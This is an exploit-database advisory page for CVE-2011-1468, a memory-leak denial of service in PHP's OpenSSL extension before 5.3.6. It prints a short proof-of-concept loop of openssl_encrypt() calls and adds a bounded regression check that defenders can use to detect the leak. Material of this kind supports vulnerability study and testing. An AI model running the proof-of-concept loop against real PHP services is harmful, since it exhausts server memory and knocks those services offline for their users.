PHP < 5.3.6 'OpenSSL' Extension - 'openssl_encrypt' Plaintext Data Memory Leak Denial of Service

πŸ—“οΈΒ 08 Mar 2011Β 00:00:00Reported byΒ dovbyshTypeΒ 
exploitdb
Β exploitdb
πŸ”—Β www.exploit-db.comπŸ‘Β 47Β Views

Related

Reporter | Title | Published | Views | Family
Veracode | Denial Of Service (DoS) | 10 Apr 2020 01:03 | – | veracode
seebug.org | PHP "OpenSSL" Extension Multiple Denial of Service Vulnerabilities | 27 Mar 2011 00:00 | – | seebug
UbuntuCve | CVE-2011-1468 | 19 Mar 2011 00:00 | – | ubuntucve
CVE | CVE-2011-1468 | 20 Mar 2011 02:00 | – | cve
Prion | Design/Logic Flaw | 20 Mar 2011 02:00 | – | prion
NVD | CVE-2011-1468 | 20 Mar 2011 02:00 | – | nvd
Cvelist | CVE-2011-1468 | 20 Mar 2011 01:00 | – | cvelist
Exploit DB | PHP < 5.3.6 'OpenSSL' Extension - 'openssl_decrypt' Ciphertext Data Memory Leak Denial of Service | 8 Mar 2011 00:00 | – | exploitdb
OpenVAS | RedHat Update for php53 and php RHSA-2011:1423-01 | 3 Nov 2011 00:00 | – | openvas
OpenVAS | CentOS Update for php53 CESA-2011:1423 centos5 i386 | 3 Nov 2011 00:00 | – | openvas

source: https://www.securityfocus.com/bid/46977/info

PHP is prone to multiple remote denial-of-service vulnerabilities that affect the 'OpenSSL' extension.

Successful attacks will cause the application to consume excessive memory, creating a denial-of-service condition.

Versions prior to PHP 5.3.6 are vulnerable. 

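<?php
// Proof of concept from the advisory: calls openssl_encrypt() in a loop and
// reports throughput. On PHP < 5.3.6 process memory grows as the loop runs.

$data = "jfdslkjvflsdkjvlkfjvlkjfvlkdm,4w 043920r 9234r 32904r 09243 r7-89437 r892374 r894372 r894 7289r7 f  frwerfh i iurf iuryw uyrfouiwy ruy 972439 8478942 yrhfjkdhls";
$pass = "r23498rui324hjbnkj";

$maxi = 200000; // number of encryption calls
$t = microtime(true);
for ($i = 0; $i < $maxi; $i++) {
    // 4th argument false = base64-encoded output; last argument is the 8-byte IV
    openssl_encrypt($data . $i, 'des3', $pass, false, '1qazxsw2');
}
$t = microtime(true) - $t;
print "mode: openssl_encrypt ($maxi) tests takes ".$t."secs ".($maxi/$t)."#/sec \n";

?>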
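
A bounded check a defender can run to confirm whether a given PHP build still shows this memory growth, added here as an example (it is not part of the original advisory or of PHP itself). It assumes Linux, since it reads VmRSS from /proc/self/status so that growth is visible whichever allocator holds the memory; the function names, iteration count, 1024 kB threshold and sample inputs are constructed for illustration.

```php
<?php
// Added example: bounded regression check for memory growth in openssl_encrypt().
// Assumes Linux (/proc/self/status). Iteration count and threshold are constructed values.

function rss_kb() {
    // Resident set size of this process in kB, or -1 if it cannot be read.
    $status = @file_get_contents('/proc/self/status');
    if ($status !== false && preg_match('/^VmRSS:\s+(\d+)\s+kB/m', $status, $m)) {
        return (int) $m[1];
    }
    return -1;
}

function measure_encrypt_growth($iterations) {
    $data = str_repeat('A', 160);   // constructed plaintext, similar in size to the advisory's
    $pass = 'constructed-test-key'; // constructed key material
    $iv   = '12345678';             // constructed 8-byte IV for des3
    // Warm-up so one-time allocations are not counted as growth.
    for ($i = 0; $i < 1000; $i++) {
        openssl_encrypt($data . $i, 'des3', $pass, false, $iv);
    }
    $before = rss_kb();
    for ($i = 0; $i < $iterations; $i++) {
        openssl_encrypt($data . $i, 'des3', $pass, false, $iv);
    }
    $after = rss_kb();
    if ($before < 0 || $after < 0) {
        return null;                // RSS not available on this platform
    }
    return $after - $before;        // growth in kB across the measured loop
}

$iterations = 20000;                // far below the advisory's 200000, enough to show a trend
$limitKb    = 1024;                 // constructed threshold for "RSS keeps growing"
$oldVersion = version_compare(PHP_VERSION, '5.3.6', '<'); // affected range stated by the advisory
$growth     = measure_encrypt_growth($iterations);

printf("PHP %s: version in affected range: %s\n", PHP_VERSION, $oldVersion ? 'yes' : 'no');
if ($growth === null) {
    print "RSS growth: not measurable here, rely on the version check\n";
    exit($oldVersion ? 1 : 2);
}
printf("RSS growth over %d calls: %d kB (limit %d kB)\n", $iterations, $growth, $limitKb);
exit(($oldVersion || $growth > $limitKb) ? 1 : 0);
```

Exit status 0 means neither the version check nor the growth measurement flagged the build; distribution packages may backport the fix, so a flagged version with flat RSS is expected on patched vendor builds.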
